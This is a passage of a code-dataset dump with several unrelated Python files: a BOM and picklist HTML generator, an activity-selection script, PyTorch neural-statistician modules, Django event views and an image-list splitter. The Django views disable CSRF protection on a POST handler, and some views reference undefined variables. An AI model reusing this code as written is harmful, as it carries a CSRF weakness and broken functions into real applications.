{:5}|\").format(\n references,\n part,\n quantity))\n print(('{:_<162}').format(\"\"))\n\n uniqueNames = []\n\n if n_components == 0:\n # print(\"| | |\")\n print((\"| {:100} | {:21} | {:16} | {:12} |\").format(\n \"No matching parts in database\", \"\", \"\", \"\"))\n print(('{:_<162}').format(\"\"))\n\n octopartLookup(part, species)\n print('\\n\\n')\n\n else:\n for (\n name,\n description,\n stockLevel,\n minStockLevel,\n averagePrice,\n partNum,\n storage_locn,\n PKid,\n Manufacturer) in component_info:\n ROHS = partStatus(PKid, 'RoHS')\n Lifecycle = partStatus(PKid, 'Lifecycle Status')\n # Can get rid of loop as never reset now\n print(\n (\"| {:100} | Location = {:10} | Part no = {:6} | Stock = {:5}|\").format(\n description, storage_locn, partNum, stockLevel))\n print(('{:_<162}').format(\"\"))\n print(\n (\"| Manufacturing status: {} {:<136}|\").format(\n \"\", Lifecycle))\n print((\"| RoHS: {}{:<153}|\").format(\"\", ROHS))\n print((\"| Name: {}{:<153}|\").format(\"\", name))\n getDistrib(PKid)\n print(('{:_<162}').format(\"\"))\n octopartLookup(name, species)\n print('\\n\\n')\n\n# More than one matching component exists - prompt user to choose\n if len(component_info) >= 2:\n component_info = get_choice(component_info)\n for (\n name,\n description,\n stockLevel,\n minStockLevel,\n averagePrice,\n partNum,\n storage_locn,\n PKid,\n Manufacturer) in component_info:\n ROHS = partStatus(PKid, 'RoHS')\n Lifecycle = partStatus(PKid, 'Lifecycle Status')\n\n if n_components != 0 and (quantity > stockLevel):\n count_LowStockLines = count_LowStockLines + 1\n background = 'rgba(60, 0, 0, 0.15)' # Insufficient stock : pinkish\n under.write(\n name +\n ',' +\n description +\n ',' +\n str(quantity) +\n ',' +\n str(stockLevel) +\n ',' +\n str(minStockLevel) +\n '\\n')\n else:\n background = 'rgba(0, 60, 0, 0.15)' # Adequate stock : greenish\n\n countParts = countParts + quantity\n quantity = str(quantity)\n\n\n# Print header row with white background - should move this somewwhere\n# else....\n if run == 0:\n web.write(\n \"\")\n web.write(\"\")\n picklist.write(\"\")\n picklist.write(\n \"\")\n run = 1\n\n# No PK components fit search criteria. 
Deal with here and drop before loop.\n# Not ideal but simpler.\n if n_components == 0:\n count_NPKP = count_NPKP + 1\n averagePrice = 0\n\n background = 'rgba(0, 60, 60, 0.3)' # Green Blue background\n web.write(\"\")\n web.write(\n \"\")\n web.write(\n \"\")\n web.write(\"\")\n web.write(\"\")\n web.write(\n \"\")\n web.write(\n \"\")\n web.write(\n \"\")\n web.write(\"\")\n web.write(\"\")\n\n picklist.write('\\n')\n\n missing.write(part + ',' + quantity + ',' + references + '\\n')\n name = \"-\"\n\n if n_components > 1: # Multiple component fit search criteria - set brown background\n background = 'rgba(60, 60, 0, 0.4)'\n\n i = 0\n for (\n name,\n description,\n stockLevel,\n minStockLevel,\n averagePrice,\n partNum,\n storage_locn,\n PKid,\n Manufacturer) in component_info:\n web.write(\"\")\n picklist.write('\\n')\n picklist.write(\"\")\n if i == 0: # 1st line where multiple components fit search showing RefDes\n web.write(\n \"\")\n picklist.write(\"\")\n\n web.write(\"\")\n picklist.write(\"\")\n i = i + 1\n count_PKP = count_PKP + 1\n else: # 2nd and subsequent lines where multiple components fit search showing RefDes\n web.write(\n \"\")\n picklist.write(\n \"\")\n invalidate_BOM_Cost = True\n lineCost = float(averagePrice) * int(quantity)\n if lineCost == 0:\n count_PWP += 1\n\n rohsIcon = compliance[ROHS]\n lifecycleIcon = manufacturing[Lifecycle]\n\n web.write(\n \"\")\n web.write(\"\")\n\n picklist.write(\"\")\n picklist.write(\"\")\n\n# Part number exists, therefore generate bar code\n# Requires Zint >1.4 - doesn't seem to like to write to another directory.\n# Ugly hack - write to current directory and move into place.\n if partNum != \"\":\n part_no = \"\"\n part_no = (partNum[1:])\n subprocess.call(['/usr/local/bin/zint',\n '--filetype=png',\n '-w',\n '10',\n '--height',\n '20',\n '-o',\n part_no,\n '-d',\n partNum])\n os.rename(part_no + '.png',\n 'assets/barcodes/' + part_no + '.png')\n if Manufacturer:\n web.write(\"\")\n else:\n web.write(\"\")\n picklist.write(\n \"\")\n else:\n # No Part number\n web.write(\n \"\")\n picklist.write(\n \"\")\n\n# Storage location exists, therefore generate bar code. Ugly hack - my location codes start with\n# a '$' which causes problems. 
Name the file without the leading character.\n if storage_locn != \"\":\n locn_trim = \"\"\n locn_trim = (storage_locn[1:])\n subprocess.call(['/usr/local/bin/zint',\n '--filetype=png',\n '-w',\n '10',\n '--height',\n '20',\n '-o',\n locn_trim,\n '-d',\n storage_locn])\n os.rename(\n locn_trim +\n '.png',\n 'assets/barcodes/' +\n locn_trim +\n '.png')\n\n web.write(\"\")\n else:\n # No storage location\n web.write(\n \"\")\n picklist.write(\"\")\n\n avPriceFMT = str(('£{:0,.2f}').format(averagePrice))\n linePriceFMT = str(('£{:0,.2f}').format(lineCost))\n bomCost = bomCost + lineCost\n\n web.write(\n \"\")\n web.write(\"\")\n web.write(\"\")\n web.write('\\n')\n\n picklist.write(\"\")\n\n picklist.write(\"\")\n picklist.write(\"\\n\")\n\n# Make labels for packets (need extra barcodes here)\n subprocess.call(['/usr/local/bin/zint',\n '--filetype=png',\n '-w',\n '10',\n '--height',\n '20',\n '-o',\n name,\n '-d',\n name])\n os.rename(name + '.png', 'assets/barcodes/' + name + '.png')\n subprocess.call(['/usr/local/bin/zint',\n '--filetype=png',\n '-w',\n '10',\n '--height',\n '20',\n '-o',\n quantity,\n '-d',\n quantity])\n os.rename(quantity + '.png',\n 'assets/barcodes/' + quantity + '.png')\n\n# Write out label webpage too\n labels.write(\"\")\n\n label_cnt = label_cnt + 1\n if label_cnt == 3:\n labels.write(\"\")\n label_cnt = 0\n\n# Prevent variables from being recycled\n storage_locn = \"\"\n partNum = \"\"\n part_no = \"\"\n\n writeCSV.writerow([references, name, quantity])\n references = \"\"\n name = \"\"\n quantity = \"\"\n\n# Write out footer for webpage\n web.write((\"
ReferencesPartDescriptionStockManufacturerDistributorQtyEachLine
ReferencesPartDescriptionStockPart NumberLocationQtyPick
\" +\n references +\n \"\" +\n part +\n \" Non PartKeepr componentNANA   NA \" +\n quantity +\n \"
\" +\n references +\n \"\" +\n references + \"\" + name + \"\" + name + \" *** ATTENTION *** Multiple sources available *** Use only ONE line *** *** ATTENTION *** Multiple sources available *** Use only ONE line *** \" +\n description +\n \" \" +\n str(stockLevel) + \"\" + description + \"\" +\n str(stockLevel) + \"\" + Manufacturer + \"NA NA NA \")\n distributors = getDistrib(PKid)\n web.write(\"\")\n for distributor in distributors:\n web.write(\"\")\n else:\n web.write(distributor[1])\n web.write(\"\")\n web.write(\"
\")\n web.write(distributor[0])\n web.write(\"\")\n if distributor[2]:\n web.write(\"\")\n web.write(distributor[1])\n web.write(\"
\")\n picklist.write(\n \"
NA NA \" +\n quantity +\n \" \" +\n avPriceFMT + \" \" +\n linePriceFMT + \"
\" +\n quantity + \"

\" + description[:64].upper())\n labels.write(\"

\")\n labels.write(\"

\" + name)\n labels.write(\"

\")\n labels.write(\"

\")\n labels.write(\n \"

Part number: #\" +\n part_no +\n \"
\")\n labels.write(\n \"
Location:\" +\n storage_locn +\n \"
\")\n labels.write(\"
\")\n labels.write(\"
\")\n labels.write(\n \"
Quantity: \" +\n quantity +\n \"
\")\n labels.write(\"

\")\n labels.write(\"

\" + file_name.upper())\n labels.write(\"

\")\n labels.write(\"

\" + references)\n labels.write(\"

\"))\n\n# Write out footer for picklist\n picklist.write((\"\"))\n\n# Write out footer for labels\n labels.write((\"\"))\n\n# Now script has run, construct table with part counts 7 costs etc.\n bomCostDisp = str(('£{:0,.2f}').format(bomCost))\n\n accounting.write(\"\")\n accounting.write(\" Total parts \")\n accounting.write(\"\" + str(countParts) + \"\")\n accounting.write(\"\")\n accounting.write(\" BOM Lines \")\n accounting.write(\"\" + str(count_BOMLine) + \"\")\n accounting.write(\"\")\n accounting.write(\" Non-PartKeepr Parts \")\n accounting.write(\"\" + str(count_NPKP) + \"\")\n accounting.write(\"\")\n accounting.write(\"PartKeepr Parts\")\n accounting.write(\"\" + str(count_PKP) + \"\")\n accounting.write(\"\")\n accounting.write(\"Parts without pricing info\")\n accounting.write(\"\" + str(count_PWP) + \"\")\n accounting.write(\"\")\n accounting.write(\"Low Stock\")\n accounting.write(\"\" + str(count_LowStockLines) + \"\")\n accounting.write(\"\")\n accounting.write(\"BOM Cost (Based on PartKeepr inventory prices)\")\n if not invalidate_BOM_Cost:\n accounting.write(\"\" + bomCostDisp + \"\")\n else:\n accounting.write(\"BOM price not calculated\")\n accounting.write(\n (\"

\"))\n\n# Assemble webpage\nweb = open(\"assets/web/temp.html\", \"r\")\nweb_out = open(\"webpage.html\", \"w\")\n\n\naccounting = open(\"assets/web/accounting.html\", \"r\")\naccounting = accounting.read()\n\nhtmlBody = web.read()\n\nweb_out.write(htmlHeader)\nweb_out.write(htmlAccountingHeader + accounting + \"
\")\nweb_out.write(htmlBodyHeader + htmlBody)\n\n# Open webpage in default browser\nwebbrowser.open('file://' + os.path.realpath('webpage.html'))\n","sub_path":"K2PK.py","file_name":"K2PK.py","file_ext":"py","file_size_in_byte":43480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"214865832","text":"def MaxActivities(arr, n):\r\n selected = []\r\n \r\n # Sort jobs according to finish time\r\n Activity.sort(key = lambda x : x[1])\r\n \r\n # The first activity always gets selected\r\n i = 0\r\n selected.append(arr[i])\r\n \r\n for j in range(1, n):\r\n \r\n '''If this activity has start time greater than or\r\n equal to the finish time of previously selected\r\n activity, then select it'''\r\n if arr[j][0] >= arr[i][1]:\r\n selected.append(arr[j])\r\n i = j\r\n return selected\r\n \r\n# Driver code\r\nActivity = [[5, 9], [1, 2], [3, 4], [0, 6],[5, 7], [8, 9]] \r\nn = len(Activity)\r\nselected = MaxActivities(Activity, n)\r\nprint(\"Following activities are selected :\")\r\nprint(selected)","sub_path":"Activity_Selection.py","file_name":"Activity_Selection.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"232773103","text":"import torch\n\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.autograd import Variable\n\n\n# Module for residual/skip connections\nclass FCResBlock(nn.Module):\n def __init__(self, dim, n, nonlinearity, batch_norm=True):\n \"\"\"\n\n :param dim:\n :param n:\n :param nonlinearity:\n \"\"\"\n super(FCResBlock, self).__init__()\n self.n = n\n self.nonlinearity = nonlinearity\n self.batch_norm = batch_norm\n if self.batch_norm:\n self.block = nn.ModuleList(\n [nn.ModuleList([nn.Linear(dim, dim), nn.BatchNorm1d(num_features=dim)])\n for _ in range(self.n)]\n )\n else:\n self.block = nn.ModuleList([nn.Linear(dim, dim) for _ in range(self.n)])\n\n def forward(self, x):\n e = x + 0\n\n if self.batch_norm:\n for i, pair in enumerate(self.block):\n fc, bn = pair\n e = fc(e)\n e = bn(e)\n if i < (self.n - 1):\n e = self.nonlinearity(e)\n\n else:\n for i, layer in enumerate(self.block):\n e = layer(e)\n if i < (self.n - 1):\n e = self.nonlinearity(e)\n\n return self.nonlinearity(e + x)\n\n\n# Building block for convolutional encoder with same padding\nclass Conv2d3x3(nn.Module):\n def __init__(self, in_channels, out_channels, downsample=False):\n super(Conv2d3x3, self).__init__()\n stride = 2 if downsample else 1\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=3,\n padding=1, stride=stride)\n\n def forward(self, x):\n return self.conv(x)\n\n\n# SHARED CONVOLUTIONAL ENCODER\nclass SharedConvolutionalEncoder(nn.Module):\n def __init__(self, nonlinearity):\n super(SharedConvolutionalEncoder, self).__init__()\n self.nonlinearity = nonlinearity\n\n self.conv_layers = nn.ModuleList([\n Conv2d3x3(in_channels=3, out_channels=32),\n Conv2d3x3(in_channels=32, out_channels=32),\n Conv2d3x3(in_channels=32, out_channels=32, downsample=True),\n # shape is now (-1, 32, 32, 32)\n Conv2d3x3(in_channels=32, out_channels=64),\n Conv2d3x3(in_channels=64, out_channels=64),\n Conv2d3x3(in_channels=64, out_channels=64, downsample=True),\n # shape is now (-1, 64, 16, 16)\n Conv2d3x3(in_channels=64, out_channels=128),\n Conv2d3x3(in_channels=128, out_channels=128),\n Conv2d3x3(in_channels=128, out_channels=128, downsample=True),\n # shape is now (-1, 128, 8, 8)\n Conv2d3x3(in_channels=128, out_channels=256),\n 
Conv2d3x3(in_channels=256, out_channels=256),\n Conv2d3x3(in_channels=256, out_channels=256, downsample=True)\n # shape is now (-1, 256, 4, 4)\n ])\n\n self.bn_layers = nn.ModuleList([\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=256),\n ])\n\n def forward(self, x):\n h = x.view(-1, 3, 64, 64)\n for conv, bn in zip(self.conv_layers, self.bn_layers):\n h = conv(h)\n h = bn(h)\n h = self.nonlinearity(h)\n return h\n\n\n# PRE-POOLING FOR STATISTIC NETWORK\nclass PrePool(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, batch_size, n_features, n_hidden, hidden_dim, nonlinearity):\n super(PrePool, self).__init__()\n self.batch_size = batch_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.fc = nn.Linear(self.n_features, self.hidden_dim)\n self.bn = nn.BatchNorm1d(self.hidden_dim)\n\n def forward(self, h):\n # reshape and affine\n e = h.view(-1, self.n_features)\n e = self.fc(e)\n e = self.bn(e)\n e = self.nonlinearity(e)\n\n return e\n\n\n# POST POOLING FOR STATISTIC NETWORK\nclass PostPool(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, n_hidden, hidden_dim, c_dim, nonlinearity):\n super(PostPool, self).__init__()\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.fc_layers = nn.ModuleList([nn.Linear(self.hidden_dim, self.hidden_dim),\n nn.Linear(self.hidden_dim, self.hidden_dim)])\n self.bn_layers = nn.ModuleList([nn.BatchNorm1d(self.hidden_dim),\n nn.BatchNorm1d(self.hidden_dim)])\n\n self.fc_params = nn.Linear(self.hidden_dim, 2 * self.c_dim)\n self.bn_params = nn.BatchNorm1d(1, eps=1e-3, momentum=1e-2)\n\n def forward(self, e):\n for fc, bn in zip(self.fc_layers, self.bn_layers):\n e = fc(e)\n e = bn(e)\n e = self.nonlinearity(e)\n\n # affine transformation to parameters\n e = self.fc_params(e)\n\n # 'global' batch norm\n e = e.view(-1, 1, 2 * self.c_dim)\n e = self.bn_params(e)\n e = e.view(-1, 2 * self.c_dim)\n\n mean, logvar = e[:, :self.c_dim], e[:, self.c_dim:]\n\n return mean, logvar\n\n\n# STATISTIC NETWORK q(c|D)\nclass StatisticNetwork(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, batch_size, sample_size, n_features,\n n_hidden, hidden_dim, c_dim, nonlinearity):\n super(StatisticNetwork, self).__init__()\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.prepool = PrePool(self.batch_size, self.n_features,\n self.n_hidden, self.hidden_dim, self.nonlinearity)\n self.postpool = PostPool(self.n_hidden, self.hidden_dim,\n self.c_dim, self.nonlinearity)\n\n def forward(self, h):\n e = self.prepool(h)\n e = self.pool(e)\n e = self.postpool(e)\n return e\n\n def pool(self, e):\n e = e.view(self.batch_size, self.sample_size, self.hidden_dim)\n e = e.mean(1).view(self.batch_size, self.hidden_dim)\n return e\n\n\nclass InferenceNetwork(nn.Module):\n \"\"\"\n Inference network q(z|h, z, c) gives approximate posterior over latent 
variables.\n \"\"\"\n def __init__(self, batch_size, sample_size, n_features,\n n_hidden, hidden_dim, c_dim, z_dim, nonlinearity):\n super(InferenceNetwork, self).__init__()\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.z_dim = z_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.fc_h = nn.Linear(self.n_features, self.hidden_dim)\n self.fc_c = nn.Linear(self.c_dim, self.hidden_dim)\n self.fc_z = nn.Linear(self.z_dim, self.hidden_dim)\n\n self.fc_res_block = FCResBlock(dim=self.hidden_dim, n=self.n_hidden,\n nonlinearity=self.nonlinearity, batch_norm=True)\n\n self.fc_params = nn.Linear(self.hidden_dim, 2 * self.z_dim)\n self.bn_params = nn.BatchNorm1d(1, eps=1e-3, momentum=1e-2)\n\n def forward(self, h, z, c):\n # combine h, z, and c\n # embed h\n eh = h.view(-1, self.n_features)\n eh = self.fc_h(eh)\n eh = eh.view(self.batch_size, self.sample_size, self.hidden_dim)\n\n # embed z if we have more than one stochastic layer\n if z is not None:\n ez = z.view(-1, self.z_dim)\n ez = self.fc_z(ez)\n ez = ez.view(self.batch_size, self.sample_size, self.hidden_dim)\n else:\n ez = Variable(torch.zeros(eh.size()).cuda())\n\n # embed c and expand for broadcast addition\n ec = self.fc_c(c)\n ec = ec.view(self.batch_size, 1, self.hidden_dim).expand_as(eh)\n\n # sum and reshape\n e = eh + ez + ec\n e = e.view(self.batch_size * self.sample_size, self.hidden_dim)\n e = self.nonlinearity(e)\n\n # for layer in self.fc_block:\n e = self.fc_res_block(e)\n\n # affine transformation to parameters\n e = self.fc_params(e)\n\n # 'global' batch norm\n e = e.view(-1, 1, 2 * self.z_dim)\n e = self.bn_params(e)\n e = e.view(-1, 2 * self.z_dim)\n\n mean, logvar = e[:, :self.z_dim].contiguous(), e[:, self.z_dim:].contiguous()\n\n return mean, logvar\n\n\n# LATENT DECODER p(z|z, c)\nclass LatentDecoder(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, batch_size, sample_size, n_features,\n n_hidden, hidden_dim, c_dim, z_dim, nonlinearity):\n super(LatentDecoder, self).__init__()\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.z_dim = z_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.fc_c = nn.Linear(self.c_dim, self.hidden_dim)\n self.fc_z = nn.Linear(self.z_dim, self.hidden_dim)\n\n self.fc_res_block = FCResBlock(dim=self.hidden_dim, n=self.n_hidden,\n nonlinearity=self.nonlinearity, batch_norm=True)\n\n self.fc_params = nn.Linear(self.hidden_dim, 2 * self.z_dim)\n self.bn_params = nn.BatchNorm1d(1, eps=1e-3, momentum=1e-2)\n\n def forward(self, z, c):\n # combine z and c\n # embed z if we have more than one stochastic layer\n if z is not None:\n ez = z.view(-1, self.z_dim)\n ez = self.fc_z(ez)\n ez = ez.view(self.batch_size, self.sample_size, self.hidden_dim)\n else:\n ez = Variable(torch.zeros(self.batch_size, 1, self.hidden_dim).cuda())\n\n # embed c and expand for broadcast addition\n ec = self.fc_c(c)\n ec = ec.view(self.batch_size, 1, self.hidden_dim).expand_as(ez)\n\n # sum and reshape\n e = ez + ec\n e = e.view(-1, self.hidden_dim)\n e = self.nonlinearity(e)\n\n # for layer in self.fc_block:\n e = self.fc_res_block(e)\n\n # affine transformation to parameters\n e = self.fc_params(e)\n\n # 'global' batch norm\n e = e.view(-1, 1, 2 * self.z_dim)\n e = self.bn_params(e)\n e = e.view(-1, 2 * self.z_dim)\n\n mean, 
logvar = e[:, :self.z_dim].contiguous(), e[:, self.z_dim:].contiguous()\n\n return mean, logvar\n\n\n# Observation Decoder p(x|z, c)\nclass ObservationDecoder(nn.Module):\n \"\"\"\n\n \"\"\"\n def __init__(self, batch_size, sample_size, n_features,\n n_hidden, hidden_dim, c_dim, n_stochastic, z_dim,\n nonlinearity):\n super(ObservationDecoder, self).__init__()\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.n_stochastic = n_stochastic\n self.z_dim = z_dim\n\n self.nonlinearity = nonlinearity\n\n # shared learnable log variance parameter\n self.logvar = nn.Parameter(torch.randn(1, 3, 64, 64).cuda())\n\n # modules\n self.fc_zs = nn.Linear(self.n_stochastic * self.z_dim, self.hidden_dim)\n self.fc_c = nn.Linear(self.c_dim, self.hidden_dim)\n\n self.fc_initial = nn.Linear(self.hidden_dim, self.hidden_dim)\n self.fc_linear = nn.Linear(self.hidden_dim, self.n_features)\n\n self.conv_layers = nn.ModuleList([\n Conv2d3x3(in_channels=256, out_channels=256),\n Conv2d3x3(in_channels=256, out_channels=256),\n nn.ConvTranspose2d(in_channels=256, out_channels=256,\n kernel_size=2, stride=2),\n Conv2d3x3(in_channels=256, out_channels=128),\n Conv2d3x3(in_channels=128, out_channels=128),\n nn.ConvTranspose2d(in_channels=128, out_channels=128,\n kernel_size=2, stride=2),\n Conv2d3x3(in_channels=128, out_channels=64),\n Conv2d3x3(in_channels=64, out_channels=64),\n nn.ConvTranspose2d(in_channels=64, out_channels=64,\n kernel_size=2, stride=2),\n Conv2d3x3(in_channels=64, out_channels=32),\n Conv2d3x3(in_channels=32, out_channels=32),\n nn.ConvTranspose2d(in_channels=32, out_channels=32,\n kernel_size=2, stride=2)\n ])\n\n self.bn_layers = nn.ModuleList([\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=32),\n ])\n\n self.conv_mean = nn.Conv2d(32, 3, kernel_size=1)\n\n def forward(self, zs, c):\n ezs = self.fc_zs(zs)\n ezs = ezs.view(self.batch_size, self.sample_size, self.hidden_dim)\n\n ec = self.fc_c(c)\n ec = ec.view(self.batch_size, 1, self.hidden_dim).expand_as(ezs)\n\n e = ezs + ec\n e = self.nonlinearity(e)\n e = e.view(-1, self.hidden_dim)\n\n e = self.fc_initial(e)\n e = self.nonlinearity(e)\n e = self.fc_linear(e)\n e = e.view(-1, 256, 4, 4)\n\n for conv, bn in zip(self.conv_layers, self.bn_layers):\n e = conv(e)\n e = bn(e)\n e = self.nonlinearity(e)\n\n mean = self.conv_mean(e)\n mean = F.sigmoid(mean)\n\n return mean, self.logvar.expand_as(mean)","sub_path":"faces/facesnets.py","file_name":"facesnets.py","file_ext":"py","file_size_in_byte":14625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"423401301","text":"from django.views.decorators.csrf import csrf_exempt, csrf_protect\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom .models import *\n\ndef inicio(request):\n html = \"\"\"

Opções

\n \n \"\"\"\n return HttpResponse(html)\n\n\ndef pessoa(request):\n p = \"

Lista de autores

\"\n pessoas = Pessoa.objects.all()\n retorno = \"\"\n for pessoa in pessoas:\n retorno += \" Nome: \" + str(pessoa.nome) + \" email: \" + str(pessoa.email)\n retorno = str(p)+\"\"+retorno\n return HttpResponse(retorno)\n\n\ndef pessoaid(request,id):\n pessoa = Pessoa.objects.get(pk=id)\n return HttpResponse(\" Nome: \" + str(pessoa.nome) + \" email: \" + str(pessoa.email))\n\ndef autor(request):\n at = \"

Lista de autores

\"\n autores = Autor.objects.all()\n for autor in autores:\n at += \" Currículo: \" + str(autor.curriculo) + \" Artigos: \" + str(autor.artigo) + \" Pessoa: \" + str(autor.Pessoa)\n return HttpResponse(\"\"+at)\n\ndef autorid(request,id):\n autor = Autor.objects.get(pk=id)\n return HttpResponse(\" Currículo: \" + str(autor.curriculo) + \" Artigos: \" + str(autor.artigo) + \" Pessoa: \" + str(autor.Pessoa))\n\ndef pessoajuridica(request):\n pj =\"

Lista de pessoas jurídicas

\"\n pessoasJuridicas = PessoaJuridica.objects.all()\n for pessoaJuridica in pessoasJuridicas:\n pj += \" CNPJ: \"+ str(pessoaJuridica.cnpj)+ \" razaoSocial: \"+ str(pessoaJuridica.razaoSocial) + \"Pessoa: \" + str(pessoaJuridica.pessoa)\n return HttpResponse(\"\"+pj)\n\ndef pessoajuridicaid(request,id):\n pessoaJuridica = PessoaJuridica.objects.get(pk=id)\n return HttpResponse(\" CNPJ: \"+ str(pessoaJuridica.cnpj)+ \" razaoSocial: \"+ str(pessoaJuridica.razaoSocial) + \"Pessoa: \" + str(pessoaJuridica.pessoa))\n\ndef pessoafisica(request):\n pf = \"

Lista de pessoas físicas

\"\n pessoasFisicas = PessoaFisica.objects.all()\n for pessoaFisica in pessoasFisicas:\n pf += \"CPF: \" + str(pessoaFisica.cpf)+\"Pessoa: \"+ str(pessoaFisica.pessoa)\n return HttpResponse(\"\"+pf)\n\ndef pessoafisicaid(request,id):\n pessoaFisica = PessoaFisica.objects.get(pk=id)\n return HttpResponse(\"CPF: \" + str(pessoaFisica.cpf)+\"Pessoa: \"+ str(pessoaFisica.pessoa))\n\ndef evento(request):\n e = \"

Lista de eventos

\"\n eventos = Evento.objects.all()\n for ev in eventos:\n e += \"Nome: \" + str(ev.nome)+ \"Evento Pricipal: \" + str(ev.eventoPrincipal) + \"Sigla: \" + str(ev.sigla) + \"Data e hora de início: \" + str(ev.dataEHoraDeInicio)+ \"Palavras-chave: \"+ str(ev.palavrasChave) + \"Logotipo: \"+ str(ev.logotipo)+ \" Realizador: \"+ str(ev.pessoa.nome) + \\\n \"Cidade: \" + str(ev.cidade) + \" UF: \" + str(ev.uf) + \" Endereço: \" + str(ev.endereco) + \" CEP: \" + str(ev.cep)\n return HttpResponse(\"\"+e)\n\ndef eventoid(request,id):\n ev = Evento.objects.get(pk=id)\n return HttpResponse(\"Nome: \" + str(ev.nome)+ \"Evento Pricipal: \" + str(ev.eventoPrincipal) + \"Sigla: \" + str(ev.sigla) + \"Data e hora de início: \" + str(ev.dataEHoraDeInicio)+ \"Palavras-chave: \"+ str(ev.palavrasChave) + \"Logotipo: \"+ str(ev.logotipo)+ \" Realizador: \"+ str(ev.pessoa.nome) + \\\n \"Cidade: \" + str(ev.cidade) + \" UF: \" + str(ev.uf) + \" Endereço: \" + str(ev.endereco) + \" CEP: \" + str(ev.cep))\n\ndef eventocientifico(request):\n ec = \"

Lista de eventos científicos

\"\n eventoscientificos = EventoCientifico.objects.all()\n for e in eventoscientificos:\n ec+= \"issn: \"+ str(e.issn)+ \" Evento: \" + str(e.evento)\n return HttpResponse(\"\"+ec)\n\ndef eventocientificoid(request,id):\n ec = EventoCientifico.objects.get(pk=id)\n return HttpResponse(\"issn: \"+ str(e.issn)+ \" Evento: \" + str(e.evento))\n\ndef artigocientifico(request):\n ac = \"

Lista de artigos científicos

\"\n artigos = ArtigoCientifico.objects.all()\n for a in artigos:\n ac+= \"Título: \"+ str(a.titulo)+ \"Autores: \"+ str(a.autores)+\" Eventos: \" + str(a.evento)\n return HttpResponse(\"\"+ac)\n\ndef artigocientificoid(request,id):\n ac = ArtigooCientifico.objects.get(pk=id)\n return HttpResponse(\"Título: \"+ str(a.titulo)+ \"Autores: \"+ str(a.autores)+\" Eventos: \" + str(a.evento))\n\n\ndef listaInscricoes(request):\n html = \"

Lista de Tipo de Atividades

\"\n lista = InscricaoParticipantes.objects.all()\n for tipo in lista:\n html += '
  • {}
  • '.format(tipo.descricao)\n\n return HttpResponse(html)\n\n@csrf_exempt\ndef addParticipante(request):\n if request.method == 'POST':\n tipo = InscricaoParticipantes()\n tipo.descricao = request.POST['descricao']\n tipo.save()\n return HttpResponse('Inscrição realizada com sucesso')\n else:\n return HttpResponse('Falha na inserção de inscrição')\n\ndef inscricaoDeUmEvento(request,evento,inscricaoParticipantes,id):\n return HttpResponse(\"Evento: \" + str(evento) + \"inscrições: \" + str(inscricaoParticipantes))\n","sub_path":"evento/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"154684619","text":"'''\nallocate train and validation images for training\n'''\nimport glob, os\n\n# current_dir = os.path.dirname(os.path.abspath(__file__))\n\ncurrent_dir= '/media/hkuit164/WD20EJRX/yolov3-channel-and-layer-pruning/data/yoga/JPEGImages'\n# print(current_dir)\n# percentage_test = 10\npercentage_test = 10\nfile_train = open(current_dir[:-10]+'train.txt', 'w')\nfile_test = open(current_dir[:-10]+'val.txt', 'w')\n\ncounter = 1\nindex_test = round(100 / percentage_test)\n# print(list(glob.iglob(os.path.join(current_dir, \"*.jpg\"))))\nfor pathAndFilename in glob.iglob(os.path.join(current_dir, \"*.jpg\")):\n title, ext = os.path.splitext(os.path.basename(pathAndFilename))\n if counter == index_test:\n counter = 1\n file_test.write('./data/yoga/JPEGImages' + \"/\" + title + \".jpg\" + \"\\n\")\n else:\n file_train.write('./data/yoga/JPEGImages' + \"/\" + title + \".jpg\" + \"\\n\")\n counter = counter + 